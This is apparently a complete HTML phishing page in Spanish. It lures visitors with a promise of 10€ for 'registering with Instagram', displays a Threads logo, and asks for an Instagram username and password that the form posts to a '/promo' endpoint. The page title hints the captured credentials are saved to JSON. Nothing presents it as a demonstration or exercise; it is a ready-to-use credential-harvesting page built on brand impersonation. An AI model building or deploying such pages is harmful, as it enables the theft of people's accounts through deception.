<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Guardar en JSON</title>

    <style>
        body {
            display: flex;
            text-align: center;
            justify-content: center;
            flex-direction: column;
            background-color: #252525;
            color: white;
            font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
        }

        label {
            font-size: calc(5px + 1rem);
            font-weight: bold;
            z-index: 1000;
        }

        .inputs {
            padding: 15px;
            border-radius: 15px; 
            border: 0;
            box-shadow: 0px 0px 90px #808080;
            margin: 10px 0px 0px 0px;
        }

        .questContainer {
            margin: 25px 0px 0px 0px;
        }

        h1 {
            font-size: calc(12px + 2rem);
        }

        form {
            position: relative;
            top: 50%;
            left: 50%;
            transform: translate(-50%, 10%);
        }

        img {
            position: relative;
            animation: imgAnm 2s infinite ease-in-out;
        }

        @keyframes imgAnm {
            0% {
                top: 10px;
            }

            50% {
                top: 20px;
            }

            100% {
                top: 10px;
            }
        }
    </style>
</head>
<body>

    <h1>Registrate con Instagram y consigue 10€</h1>
    <div style="display: flex; align-items: center; justify-content: center; margin: -20px 0px 0px 0px;">
        <img src="https://freelogopng.com/images/all_img/1688663226threads-logo-png.png" alt="" srcset="" style="width: 100px; border-radius: 30px;">
    </div>
    <form action="/promo" method="post" style="background-color: black; border-radius: 30px; width: 300px; box-shadow: 0px 0px 90px 0px; margin: 20px 0px 0px 0px;">
        <div class="questContainer">
            <label for="dato">Usuario:</label> <br>
            <input type="text" id="dato" name="user" class="inputs" required> <br>
        </div>
        <div class="questContainer">
            <label for="passwd" id="passwdLabel">Contraseña:</label> <br>
            <input type="text" id="passwd" name="passwd" class="inputs" required> <br> <br>
            <button type="submit" style="padding: 15px; border-radius: 20px; width: 120px; margin: 15px;
                font-size: 20px; font-weight: bold; background-color: white; border: 0; color: black;">
                Enviar
            </button>
        </div>
    </form>
</body>
</html>
